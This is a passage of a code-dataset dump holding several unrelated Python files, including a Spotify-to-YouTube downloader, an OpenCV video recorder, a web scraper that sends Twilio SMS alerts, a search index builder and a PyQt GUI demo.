spotipy\")\n\t\t\ttry:\n\t\t\t\tself.sp_tracklist = self.sp.get_tracklist(self.kwargs[\"link\"])\n\n\t\t\t\tif self.sp_tracklist:\n\t\t\t\t\tlog.info('got %s \"%s\" by \"%s\"' % \n\t\t\t\t\t\t(self.sp_tracklist.type, self.sp_tracklist.name, self.sp_tracklist.owner or self.sp_tracklist.artist))\n\t\t\t\t\tself.make_folder()\n\t\t\t\t\tself.download_songs()\n\t\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tlog.critical(e)\n\t\telse:\n\t\t\tlog.critical(\"could not initialize spotify\")\n\n\n\tdef make_folder(self):\n\t\t\"\"\"\n\t\tif -u or --add-username:\n\t\t\tadds \"by username\" to folder name (only for playlists)\n\t\tif -d or --add-date:\n\t\t\tfor playlist - adds last edit date (useful for Discover Weekly)\n\t\t\tfor album - adds publish date\n\t\tif -f or --add-folder:\n\t\t\tfor playlist - make separate folder if date (-d) exists\n\t\t\tfor albums - save album in artist folder (Artist/Album(date))\n\t\t\tfor one track - makes artist folder\n\n\t\tredo later?\n\t\t\"\"\"\n\t\tif self.kwargs[\"name\"] != None:\n\t\t\tself.folder_path += \"/\" + self.kwargs[\"name\"]\n\t\telse:\n\t\t\tjoinstr = [\"/\" , \"/\" if self.kwargs[\"add_folder\"] else \" - \", \" - \"]\n\t\t\tnames = []\n\t\t\tif (self.kwargs[\"add_folder\"] and self.sp_tracklist.type == \"track\") or self.sp_tracklist.type == \"album\":\n\t\t\t\tnames += [self.sp_tracklist.artist]\n\t\t\tif self.sp_tracklist.name:\n\t\t\t\tn = self.sp_tracklist.name\n\t\t\t\tif self.kwargs[\"add_username\"] and self.sp_tracklist.type == \"playlist\":\n\t\t\t\t\tn += \" by \" + self.sp_tracklist.owner\n\t\t\t\tnames += [n]\n\t\t\tif self.kwargs[\"add_date\"] and self.sp_tracklist.date:\n\t\t\t\tnames += [self.sp_tracklist.date[:10]]\n\t\t\tfor i,n in enumerate(names):\n\t\t\t\tself.folder_path += joinstr[i] + n\n\t\tif not os.path.isdir(self.folder_path):\n\t\t\tos.makedirs(self.folder_path)\n\t\t\tlog.info(\"created directory %s\" % self.folder_path)\n\t\tos.chdir(self.folder_path)\n\t\tlog.debug(\"changing working directory to %s\" % self.folder_path)\n\n\tdef ydl_hook(self, d):\n\t\tif d['status'] == 'finished':\n\t\t\tlog.info(\"converting to mp3\")\n\t\t# if d['status'] == 'downloading':\n\t\t# \tself.logger.info(\"downloading\")\n\t\t\n\tdef download_songs(self):\n\t\tfor i,song in enumerate(self.sp_tracklist.tracklist):\n\t\t\tlog.info(\"%i/%i %s - %s (%i sec)\" % \n\t\t\t\t(i+1,self.sp_tracklist.size, song.artist, song.title, song.duration))\n\t\t\t\n\t\t\tfilename = song.artist + \" - \" + song.title\n\t\t\tfor c in INVALID_CHARS:\n\t\t\t\tfilename = filename.replace(c,'_')\n\n\t\t\tif os.path.exists(filename + \".mp3\"):\n\t\t\t\tself.song_info(i+1, song)\n\t\t\t\tlog.info('song with that name already exists. skipping')\n\t\t\telse:\n\t\t\t\tlog.info(\"searching youtube\")\n\t\t\t\tr = self.get_song(song)\n\t\t\t\tif r:\n\t\t\t\t\tydl_opts = {\n\t\t\t\t\t 'format': 'bestaudio/best',\n\t\t\t\t\t 'outtmpl': filename + '.%(ext)s',\n\t\t\t\t\t 'postprocessors': [{\n\t\t\t\t\t 'key': 'FFmpegExtractAudio',\n\t\t\t\t\t 'preferredcodec': 'mp3',\n\t\t\t\t\t 'preferredquality': '192',\n\t\t\t\t\t \t},],\n\t\t\t\t\t 'logger': log,\n\t\t\t\t\t\t'ignoreerrors': True,\n\t\t\t\t\t 'progress_hooks': [self.ydl_hook],\n\t\t\t\t\t}\n\n\t\t\t\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\t\t\t\tlog.info(\"downloading %s (%s)\" % (r.title, r.URL))\n\t\t\t\t\t\tydl.download([r.URL])\n\n\t\t\t\t\tif MP3:\n\t\t\t\t\t\tself.add_metadata(filename, song)\n\t\t\t\t\tself.song_info(i+1, song, True)\n\t\t\t\t\tlog.info('succesfully donloaded song')\n\t\t\t\telse:\n\t\t\t\t\tself.song_info(i+1, song, False)\n\t\t\t\t\tlog.warning('error while downloading song')\n\n\tdef get_song(self,song):\n\t\tresults = self.yt.search(song.artist + \" - \" + song.title, \n\t\t\tmaxres=min(self.kwargs[\"results\"] or 10,50) if self.kwargs[\"search_type\"] else 1)\n\t\t#set maxres if specified, 10 is default, 50 is max. if search type is 0 (first result), maxres = 1\n\t\tif not results:\n\t\t\tlog.debug(\"no youtube results\")\n\t\t\treturn None\n\t\tif self.kwargs[\"search_type\"] == 1:\n\t\t\tlog.debug(\"searching for song with equal duration\")\n\t\t\tfor res in results:\n\t\t\t\tif res.duration == song.duration:\n\t\t\t\t\treturn res\n\t\telif self.kwargs[\"search_type\"] == 2:\n\t\t\tsong.info()\n\t\t\tfor i,res in enumerate(results):\n\t\t\t\tprint(i+1)\n\t\t\t\tres.info()\n\t\t\tdec = 51\n\t\t\twhile dec > len(results) or dec < 1:\n\t\t\t\tdec = int(input(\"Enter choice: \"))\n\t\t\treturn results[dec-1]\n\t\tlog.debug(\"getting first result\")\n\t\treturn results[0]\n\n\n\tdef add_metadata(self, filename, song):\n\t\t\"\"\"\n\t\thttp://id3.org/id3v2.4.0-frames\n\t\t\"\"\"\n\t\tlog.info('adding metadata')\n\t\tlog.info(self.folder_path)\n\t\tif os.path.isfile(self.folder_path + \"/\" + filename + \".mp3\"):\n\t\t\tmp3file = MP3(filename + \".mp3\", ID3=ID3)\n\n\t\t\tif self.kwargs[\"metadata\"]:\n\t\t\t\topts = [int(o) for o in bin(self.kwargs[\"metadata\"])[2:]]\n\t\t\telse:\n\t\t\t\topts = [1,1,1] if self.sp_tracklist.type == \"album\" else [1,1,0]\n\n\t\t\tif opts[0]: #default\n\t\t\t\tmp3file['TIT2'] = TIT2(encoding=3, text=song.title)\n\t\t\t\tmp3file['TPE1'] = TPE1(encoding=3, text=song.artist)\n\n\t\t\tif opts[1]:\t#default\n\t\t\t\tmp3file['TALB'] = TALB(encoding=3, text=song.album)\n\t\t\t\tcover = requests.get(song.cover[1]).content\n\t\t\t\tif cover:\n\t\t\t\t\tmp3file['APIC'] = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Cover', data=cover)\n\t\t\t\telse:\n\t\t\t\t\tlog.warning(\"Error while getting cover\")\n\n\t\t\tif opts[2]:\t#default for album download\n\t\t\t\tmp3file['TPE2'] = TPE2(encoding=3, text=song.album_artist)\n\t\t\t\tmp3file['TPOS'] = TPOS(encoding=3, text=str(song.disc_num))\n\t\t\t\tmp3file['TRCK'] = TRCK(encoding=3, text=str(song.track_num))\n\t\t\t\t#mp3file['TIT3'] = TIT3(encoding=3, text=\"Subtitle\")\n\t\t\t\t#mp3file['COMM'] = COMM(encoding=3, text=\"Comment\")\t\t#add comment with youtube and spotify url?\n\n\t\t\tmp3file.save()\n\t\telse:\n\t\t\tlog.info(\"skipped song\")\n\n\tdef song_info(self, i, song, status = None):\n\t\tif not self.kwargs[\"verbose\"]:\n\t\t\tif status:\n\t\t\t\tstat = \"\\033[92mSuccess\\033[0m\" \n\t\t\telif status == False: \n\t\t\t\tstat = \"\\033[91m Error \\033[0m\"\n\t\t\telse:\n\t\t\t\tstat = \"\\033[93mSkipped\\033[0m\"\n\t\t\tprint(\"[%s][%d/%d] %s\" % (stat, i, self.sp_tracklist.size, song))\n\ndef parse_args(args):\n\tparser = argparse.ArgumentParser(description='Download spotify playlist/album/song from youtube')\n\tparser.add_argument('link', type=str,\n\t\thelp='Spotify link (url or uri)')\n\tparser.add_argument('-s','--search-type', type=int, choices=[0,1,2],\n\t\thelp='Define the search type: 0 - download first youtube result, 1 - download song with equal duration (default), 2 - prompt the user for every download')\n\tparser.add_argument('-r','--results', type=int,\n\t\thelp='Number of results for every youtube search. (max = 50)')\n\tparser.add_argument('-t','--token',\n\t\thelp=\"Spotify auth token. Use this if you don't have spotify app setup or you want to bypass using default user credentials\")\n\tparser.add_argument('-m','--metadata', type=int,\n\t\thelp='Add metadata tags. Input is decimal number from 0 to 7 representing binary options (title&artist | album&cover | other)')\n\tparser.add_argument('-n','--name', nargs='?', const=\"\",\n\t\thelp='Replaces folder name with the user specified one. Using only -n saves songs to default music folder or the one specified with -p. This overrides -d -u and -f arguments.')\n\tparser.add_argument('-p','--path',\n \thelp=\"Path to the folder where you want the files downloaded\")\n\tparser.add_argument('-d','--add-date',action=\"store_true\",\n\t\thelp=\"Add a date to folder name. Adds last added song date to playlists or publish date for albums (useful for downloading Discover Weekly playlists)\")\n\tparser.add_argument('-u','--add-username',action=\"store_true\",\n\t\thelp=\"Add owner name to destination folder (works only for playlists)\")\n\tparser.add_argument('-f','--add-folder',action=\"store_true\",\n\t\thelp=\"Makes subfolder if possible. Name of the folder is always the first value. (For example artist/album, playlist/date, etc...)\")\n\tparser.add_argument('-v', '--verbose', action=\"count\",\n\t\thelp=\"Print additional info or debugging information\")\n\n\targs = parser.parse_args()\n\treturn args\n\ndef main(args=None):\n\tif args is None:\n\t\tif len(sys.argv) <= 1:\n\t\t\tlog.critical('you need to provide spotify link')\n\t\t\tsys.exit()\n\t\telse:\t\n\t\t\targs = parse_args(sys.argv[1])\n\tif args.verbose:\n\t\tlog.setLevel(int(20/args.verbose))\n\tlog.debug(args)\n\tutil.init()\n\tspyt = Spytube(**vars(args))\n\tspyt.start()\t\t\n\nif __name__ == \"__main__\":\n main()","repo_name":"josduj/spytube","sub_path":"spytube/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42732480084","text":"from flask import current_app\nfrom invenio_indexer.api import RecordIndexer\nfrom invenio_search.utils import build_alias_name\nfrom oarepo_communities.search import CommunitySearch\n\n\nclass DatasetRecordsSearch(CommunitySearch):\n LIST_SOURCE_FIELDS = [\n 'InvenioID', 'oarepo:validity.valid', 'oarepo:draft',\n 'titles', 'abstract', 'creators', 'dateCreated', 'dateAvailable', 'resourceType', 'accessRights', 'rights',\n 'contributors', 'keywords', 'subjectCategories', 'relatedItems', 'oarepo:recordStatus', 'language',\n 'oarepo:primaryCommunity', 'oarepo:secondaryCommunities', '$schema', '_files'\n ]\n HIGHLIGHT_FIELDS = {\n 'titles.title.cs': None,\n 'titles.title._': None,\n 'titles.title.en': None\n }\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n # https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations.html#return-agg-type\n typed_keys = current_app.config.get(\"NR_ES_TYPED_KEYS\", False)\n self._params = {'typed_keys': typed_keys}\n\n\nclass CommitingRecordIndexer(RecordIndexer):\n def index(self, record, arguments=None, **kwargs):\n ret = super().index(record, arguments=arguments, **kwargs)\n index, doc_type = self.record_to_index(record)\n index = build_alias_name(index)\n self.client.indices.refresh(index=index)\n return ret\n","repo_name":"Narodni-repozitar/nr-datasets","sub_path":"nr_datasets/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35672661160","text":"class Solution(object):\n def __init__(self):\n self.left = -1\n self.right = -1\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n\n N = len(nums)\n\n def search(start,end):\n if start > end:\n return\n\n mid = (start + end) // 2\n\n if nums[mid] < target:\n search(mid + 1,end)\n elif nums[mid] > target:\n search(start, mid - 1)\n else:\n self.right = max(self.right , mid)\n if self.left >= 0:\n self.left = min(self.left , mid)\n else:\n self.left = mid\n search(mid + 1,end)\n search(start, mid - 1)\n \n search(0,N - 1)\n \n return [self.left, self.right]","repo_name":"DemonZhou/leetcode","sub_path":"searchRange.py","file_name":"searchRange.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4623099448","text":"import numpy as np\nimport os.path as op\nimport cv2\nimport time\nimport argparse\nfrom pathlib2 import Path\n\n# Standard Video Dimensions Sizes\nSTD_DIMENSIONS = {\n \"240p\": (426, 240),\n \"360p\": (640, 360),\n \"480p\": (854, 480),\n \"720p\": (1280, 720),\n \"1080p\": (1920, 1080),\n \"2k\": (2560, 1440),\n \"4k\": (3840, 2160),\n\n \"d346\":(346, 260) # DAVIS DVS Camera\n}\n\n# Video Encoding, might require additional installs\n# Types of Codes: http://www.fourcc.org/codecs.php\nVIDEO_TYPE = {\n '.avi': cv2.VideoWriter_fourcc(*'XVID'),\n # '.mp4': cv2.VideoWriter_fourcc(*'h264'),\n '.mp4': cv2.VideoWriter_fourcc(*'mp4v'),\n}\n\nclass VideoRecorder():\n \"\"\" Record a video using certain parameters, and output a timestamps log.\n Args:\n out_path: The path to output the video.\n fps: Frame per second.\n width: The video frame width.\n height: The video frame height.\n res: Standard resolutions.\n timelog: Whether to keep a timestamps log.\n \"\"\"\n def __init__(self, out_path=None, fps=30, width=1280, height=720, res=None, timelog=True) -> None:\n assert res in ['240p', '360p', '480p', '720p', '1080p', '2k', '4k', 'd346', None]\n self.out_path = out_path if out_path is not None else 'video.avi'\n self.out_path = get_new_path(self.out_path)\n self.fps = fps\n self.width = width\n self.height = height\n self.res = res\n self.timelog = timelog\n self.cap = None\n self.out_handler = None\n self.video_type = self.get_video_type(self.out_path)\n self.get_log_path()\n \n def start(self, cam_idx=0):\n \"\"\" Start a video stream using device at `cam_idx`.\n \"\"\"\n self.cap = cv2.VideoCapture(cam_idx)\n self.set_dims()\n real_size = (int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n out_handler = cv2.VideoWriter(self.out_path, self.video_type, self.fps, real_size)\n if self.timelog:\n logger = open(self.log_path, 'w+')\n while True:\n ret, frame = self.cap.read()\n print(frame.shape, self.width, self.height)\n if self.timelog:\n logger.write(str(time.time())+'\\n')\n out_handler.write(frame)\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n self.cap.release()\n out_handler.release()\n cv2.destroyAllWindows()\n if self.timelog:\n logger.close()\n\n # grab resolution dimensions and set video capture to it.\n def set_dims(self):\n if self.res is not None:\n self.width, self.height = STD_DIMENSIONS[self.res]\n # change the current caputre device to the resulting resolution\n if self.cap is not None:\n self.change_res(self.cap, self.width, self.height)\n\n def get_log_path(self):\n root, name = op.split(self.out_path)\n name = op.splitext(name)[0]\n self.log_path = op.join(root, name+'_timestamps.txt')\n\n # Set resolution for the video capture\n # Function adapted from https://kirr.co/0l6qmh\n @staticmethod\n def change_res(cap, width, height):\n cap.set(3, width)\n cap.set(4, height)\n \n @staticmethod\n def get_video_type(path):\n _, ext = op.splitext(path)\n if ext in VIDEO_TYPE:\n return VIDEO_TYPE[ext]\n return VIDEO_TYPE['.avi']\n\n @staticmethod\n def returnCameraIndexes():\n # checks the first 10 indexes.\n index = 0\n arr = []\n i = 10\n while i > 0:\n cap = cv2.VideoCapture(index)\n if cap.read()[0]:\n arr.append(index)\n cap.release()\n index += 1\n i -= 1\n print(f\"Cameras at the following indexes are valid: {arr}\")\n return arr\n\ndef get_new_path(path):\n \"\"\" Return a path to a file, creat its parent folder if it doesn't exist, creat new one if existing.\n\n If the folder/file already exists, this function will use `path`_`idx` as new name, and make\n corresponding folder if `path` is a folder.\n idx will starts from 1 and keeps +1 until find a valid name without occupation.\n\n If the folder and its parent folders don't exist, keeps making these series of folders.\n\n Args:\n path: The path of a file/folder.\n Returns:\n _ : The guaranteed new path of the folder/file.\n \"\"\"\n path = Path(path)\n root = Path(*path.parts[:-1])\n\n if not root.exists():\n root.mkdir(parents=True, exist_ok=True)\n\n if not path.exists():\n new_path = path\n if new_path.suffix == '':\n new_path.mkdir()\n else:\n idx = 1\n while True:\n stem = path.stem+\"_\"+str(idx)\n new_path = root / (stem+path.suffix)\n if not new_path.exists():\n if new_path.suffix == '':\n new_path.mkdir()\n break\n idx += 1\n return str(new_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-r', '--resolution', type=str, help='Standard resolution string.')\n parser.add_argument('-o', '--out_path', type=str, default='records/video.avi', help='The output video path.')\n \n parser.add_argument('-c', '--cam', type=int, help='Camera index')\n parser.add_argument('-f', '--fps', type=int, default=30, help='FPS.')\n parser.add_argument('-n', '--no_timelog', action='store_true', help='Do not keep time log.')\n \n args = parser.parse_args()\n rec = VideoRecorder(out_path=args.out_path, res=args.resolution, fps=args.fps, timelog=(not args.no_timelog))\n \n if args.cam is None:\n arr = rec.returnCameraIndexes()\n rec.start(arr[0])\n else:\n rec.start(args.cam)","repo_name":"miracleyoo/mlib","sub_path":"cv/video/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4209894020","text":"import requests\nappId=1018661814203004669\ndef Item_Search_API(keyword):\n Item_Search_API_Endpoint = \"https://app.rakuten.co.jp/services/api/IchibaItem/Search/20170706?\"\n Item_Search_API_serch_param={\"format\":\"json\",\"keyword\":keyword,\"applicationId\":appId}\n Item_Search_API_result = requests.get(Item_Search_API_Endpoint,Item_Search_API_serch_param).json()\n return Item_Search_API_result\ndef Ranking_API(gID):\n Ranking_API_Endpoint = \"https://app.rakuten.co.jp/services/api/IchibaItem/Ranking/20170628?\"\n Ranking_API_serch_param={\"applicationId\":appId,\"geneId\":gID}\n Ranking_API_result = requests.get(Ranking_API_Endpoint,Ranking_API_serch_param).json()\n return Ranking_API_result","repo_name":"hayate242/rakuten_online_tech_training_outdoor","sub_path":"TestCallAPI.py","file_name":"TestCallAPI.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74016740588","text":"# -*- coding: utf-8 -*-\n# @Date : 2018-05-21 15:50:58\n# @Author : Liu Huan (liuhuan@mail.las.ac.cn)\n\nimport sys\n\na = sys.argv[1]\nb = sys.argv[2]\nprint(a)\nprint(b)\n","repo_name":"LeoWood/AuxiliaryScripts","sub_path":"ExecByJava.py","file_name":"ExecByJava.py","file_ext":"py","file_size_in_byte":167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21094230470","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nfrom twilio.rest import Client\n\ntwilio_file = open(\"/home/dniewinski/.twilio/auth\", 'r')\ntwilio_auth = twilio_file.readlines()\ntwilio_file.close()\n\nSID = twilio_auth[0]\nAUTH = twilio_auth[1]\nTRIAL_NUMBER = twilio_auth[2]\nMY_NUMBER = twilio_auth[3]\n\nclient = Client(SID, AUTH)\n\npage = requests.get(\"https://www.instructables.com/contest/\")\n\nsoup = BeautifulSoup(page.content, 'html.parser')\ncurr_contests_div = soup.find_all(id=\"cur-contests\")[0]\ncurr_contests_imgs = curr_contests_div.find_all('img')\n\npast_contests = []\npast_contests_file_name = \"prev_contests.txt\"\nif os.path.exists(past_contests_file_name):\n past_contests_file = open(past_contests_file_name, 'r')\n for line in past_contests_file:\n past_contests.append(line.rstrip().lstrip())\n past_contests_file.close()\n\npast_contests_file = open(past_contests_file_name, 'w')\n\ntext_message = \"\"\nnew_contest = False\nfor img in curr_contests_imgs:\n contest = img.get('alt')\n past_contests_file.write(contest + \"\\n\")\n if contest not in past_contests:\n new_contest = True\n text_message = \"!NEW! \" + contest + \"\\n\" + text_message\n else:\n text_message = text_message + contest + \"\\n\"\n\nif new_contest:\n print(text_message)\n client.messages.create(to=MY_NUMBER, from_=TRIAL_NUMBER, body=text_message)\nelse:\n print(\"Nothing New\")\n\npast_contests_file.close()\n","repo_name":"david0429/InstructablesContests","sub_path":"contests.py","file_name":"contests.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"807398935","text":"from bs4 import BeautifulSoup\nfrom whoosh.analysis import StemmingAnalyzer\nfrom pathlib import Path\nimport math\n\nclass IndexBuilder:\n def __init__(self):\n self.corpusCount = 0\n\n def storeWordPosition(self, aFile: Path):\n \"\"\"Stores the word and the position of that word(doing this for query terms) in a single file\n Ex. {word : [normalized term freq], word2:[normalized term freq], ..}\n \"\"\"\n\n corpi = aFile.open( encoding='latin-1')\n f = corpi.read()\n soup = BeautifulSoup(f, 'lxml')\n ana = StemmingAnalyzer() ### lowercases, stems, ignores stopwords\n tokens = [token.text for token in ana(soup.text)]\n print(\"Indexing: \", str(aFile))\n\n wordPosition = {}\n for token in tokens:\n if token in wordPosition.keys():\n wordPosition[token]+=1\n else:\n wordPosition[token] = 1\n\n ###weighting for h1,h2,h3,strong,b,title tags for now (boosting tf score)\n # soup = BeautifulSoup(f, 'lxml')\n # for words in soup.find_all('h1'):\n # important = [token for token in word_tokenize(str(words.text).lower()) if token not in stopset and re.match(\"^[a-z].+[a-z]$\", token) ]\n # for token in important:\n # wordPosition[token]+=3\n\n\n return self.normalize(wordPosition)\n\n def normalize(self, wordPosition: dict): ###for some reason, not normalizing leads to closer scores with lucene\n \"\"\"Normalize frequencies \"\"\"\n magnitude = 0.0\n for word in wordPosition.keys():\n wordPosition[word] = 1 + math.log10(wordPosition[word])\n # magnitude += wordPosition[word] ** 2;\n # magnitude = math.sqrt(magnitude)\n # for word in wordPosition.keys():\n # wordPosition[word] /= magnitude\n return wordPosition\n\n def storeDocToWord(self):\n \"\"\" {docID: {word: [normalized tf],...}, ...} \"\"\"\n files = self.fileSearch(Path('WEBPAGES_SIMPLE'))\n total = {}\n for filename in files:\n total[str(filename)[16:]] = self.storeWordPosition(filename)\n return total\n\n def buildInvertedIndex(self):\n docToWords = self.storeDocToWord()\n invertedIndex = {}\n for filename in docToWords.keys():\n for word in docToWords[filename].keys():\n if word in invertedIndex.keys():\n invertedIndex[word].update({filename: docToWords[filename][word]})\n else:\n invertedIndex[word] = {filename: docToWords[filename][word]}\n return invertedIndex\n\n\n def fileSearch(self, path: Path):\n \"\"\"Goes through CORPUS, adds each file that needs to be indexed\"\"\"\n filesToIndex = [];\n for directory in path.iterdir():\n try:\n if(directory.is_dir()):\n for item in directory.iterdir():\n filesToIndex.append(item)\n self.corpusCount+=1\n except:\n print(\"Error while adding files to index\")\n return filesToIndex\n\n def getCorpusCount(self):\n return self.corpusCount\n\n\nimport sys\n\ndef get_size(obj, seen=None):\n \"\"\"Recursively finds size of objects\"\"\"\n size = sys.getsizeof(obj)\n if seen is None:\n seen = set()\n obj_id = id(obj)\n if obj_id in seen:\n return 0\n # Important mark as seen *before* entering recursion to gracefully handle\n # self-referential objects\n seen.add(obj_id)\n if isinstance(obj, dict):\n size += sum([get_size(v, seen) for v in obj.values()])\n size += sum([get_size(k, seen) for k in obj.keys()])\n elif hasattr(obj, '__dict__'):\n size += get_size(obj.__dict__, seen)\n elif hasattr(obj, '__iter__') and not isinstance(obj, (str, bytes, bytearray)):\n size += sum([get_size(i, seen) for i in obj])\n return size\n\n\nif __name__ == '__main__':\n test = IndexBuilder()\n x = test.buildInvertedIndex()\n print(get_size(x))\n","repo_name":"geoprism/Search-Engine","sub_path":"EngineFromScratch/indexBuilder.py","file_name":"indexBuilder.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7936055021","text":"#cuffquant\nclass CuffQuant(object):\n\tdef __init__(self, annotationFile=None, bamfile=None, genomeFile=None, outputDir=\"./\"):\n\t\tself.exe = '/share/apps/cufflinks-2.2.1.Linux_x86_64/cuffquant' \n\t\tself.annotationFile = annotationFile\n\t\tself.bamFile = bamfile\n\t\tself.genomeFile = genomeFile\n\t\tself.outputDir = outputDir\n\t\tself.threads = 8\n\n\tdef makeCommand(self):\n\t\targlist = [ \"%s\" % self.exe ]\n\t\targlist.extend([ \"-p %s \" % self.threads ])\n\t\targlist.extend([ \"-o %s \" % self.outputDir ])\n\t\tif self.genomeFile is not None:\n\t\t\t# bias correction\n\t\t\targlist.extend([ \"-b %s \" % self.genomeFile ])\n\t\t# rescue multireads\n\t\targlist.extend([ \"-u \" ])\n\t\t# GTF file\n\t\targlist.extend([ \"%s\" % self.annotationFile])\n\t\targlist.extend([ \"%s\" % self.bamFile])\n\n\t\tcmd = \" \".join(arglist)\n\t\treturn cmd\n","repo_name":"anykine/rnaseq_tools","sub_path":"scripts/cuffquant.py","file_name":"cuffquant.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39719965161","text":"from flask import Flask\nimport pytest\n\nfrom api.blueprints.drbLink import linkFetch\nfrom api.utils import APIUtils\n\nclass TestLinkBlueprint:\n @pytest.fixture\n def mockUtils(self, mocker):\n return mocker.patch.multiple(\n APIUtils,\n formatResponseObject=mocker.DEFAULT,\n formatLinkOutput=mocker.DEFAULT\n )\n \n @pytest.fixture\n def testApp(self):\n flaskApp = Flask('test')\n flaskApp.config['DB_CLIENT'] = 'testDBClient'\n\n return flaskApp\n\n def test_linkFetch_success(self, mockUtils, testApp, mocker):\n mockDB = mocker.MagicMock()\n mockDBClient = mocker.patch('api.blueprints.drbLink.DBClient')\n mockDBClient.return_value = mockDB\n\n mockDB.fetchSingleLink.return_value = 'dbLinkRecord'\n\n mockUtils['formatLinkOutput'].return_value = 'testLink'\n mockUtils['formatResponseObject'].return_value = 'singleLinkResponse'\n\n with testApp.test_request_context('/'):\n testAPIResponse = linkFetch(1)\n\n assert testAPIResponse == 'singleLinkResponse'\n mockDBClient.assert_called_once_with('testDBClient')\n\n mockUtils['formatLinkOutput'].assert_called_once_with('dbLinkRecord')\n mockUtils['formatResponseObject'].assert_called_once_with(\n 200, 'singleLink', 'testLink'\n )\n\n def test_editionFetch_missing(self, mockUtils, testApp, mocker):\n mockDB = mocker.MagicMock()\n mockDBClient = mocker.patch('api.blueprints.drbLink.DBClient')\n mockDBClient.return_value = mockDB\n\n mockDB.fetchSingleLink.return_value = None\n\n mockUtils['formatResponseObject'].return_value = '404Response'\n\n with testApp.test_request_context('/'):\n testAPIResponse = linkFetch(1)\n\n assert testAPIResponse == '404Response'\n mockDBClient.assert_called_once_with('testDBClient')\n\n mockUtils['formatLinkOutput'].assert_not_called()\n mockUtils['formatResponseObject'].assert_called_once_with(\n 404, 'singleLink', {'message': 'Unable to locate link #1'}\n )\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"tests/unit/test_api_link_blueprint.py","file_name":"test_api_link_blueprint.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"73598169388","text":"from subprocess import PIPE, Popen as popen\nfrom unittest import TestCase\n\nfrom betrack import __cli__ as CLI\nfrom betrack import __version__ as VERSION\n\nclass TestHelp(TestCase):\n def test_returns_usage_information(self):\n output = popen(['betrack', '-h'], stdout=PIPE).communicate()[0]\n self.assertTrue(b'Usage:' in output)\n\n output = popen(['betrack', '--help'], stdout=PIPE).communicate()[0]\n self.assertTrue(b'Usage:' in output)\n\n\nclass TestVersion(TestCase):\n def test_returns_version_information(self):\n output = popen(['betrack', '--version'], stdout=PIPE).communicate()[0]\n self.assertEqual(output.strip(), CLI.encode() + b' ' + VERSION.encode())\n","repo_name":"gvalentini85/betrack-cli","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16838176932","text":"# 使用网格布局\nimport sys\nfrom PyQt5.QtWidgets import QMainWindow, \\\n QApplication, \\\n QStatusBar, \\\n QMenuBar, \\\n QAction, \\\n QMenu, \\\n QLabel, \\\n QPushButton, \\\n QVBoxLayout, \\\n QHBoxLayout, QWidget, \\\n QGridLayout\nfrom PyQt5.QtCore import Qt\n\n\nclass GUI(QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('我是一个window Title')\n self.resize(500, 300)\n self.setMinimumSize(200, 200)\n self.setMaximumSize(500, 600)\n\n # 调用方法\n self.add_menu_and_status()\n\n # 调用布局方法\n self.add_postion_layout()\n\n # 设置状态和菜单\n def add_menu_and_status(self):\n # 设置状态栏\n status = QStatusBar()\n status.showMessage('显示文本')\n self.setStatusBar(status)\n\n # self.statusBar().showMessage('文本信息')\n\n # 添加菜单栏\n menu = self.menuBar()\n # 创建一个菜单\n file_menu = menu.addMenu('文件')\n # 创建一个行为\n new_action = QAction('新建文件', self)\n # 将行为添加到菜单\n file_menu.addAction(new_action)\n file_menu.addSeparator()\n # 更新状态栏文本\n new_action.setStatusTip('点击可以新建一个文件')\n\n edit_menu = menu.addMenu('修改')\n change_acion = QAction('设置', self)\n edit_menu.addAction(change_acion)\n\n # 创建另一个行为\n exit_action = QAction('退出', self)\n # 退出操作\n exit_action.setStatusTip(\"点击退出程序\")\n # 点击关闭应用\n exit_action.triggered.connect(self.close)\n # 设置快捷键\n exit_action.setShortcut('Ctrl+Q')\n # 添加退出行为到菜单上\n file_menu.addAction(exit_action)\n\n # 添加控件\n def add_postion_layout(self):\n label = QLabel(\"第一个标签\", self)\n\n label.move(20, 30)\n label2 = QLabel(\"第二个标签\", self)\n # height = self.menuBar().height()\n # print('height= f',height)\n button_1 = QPushButton('按钮1', self)\n 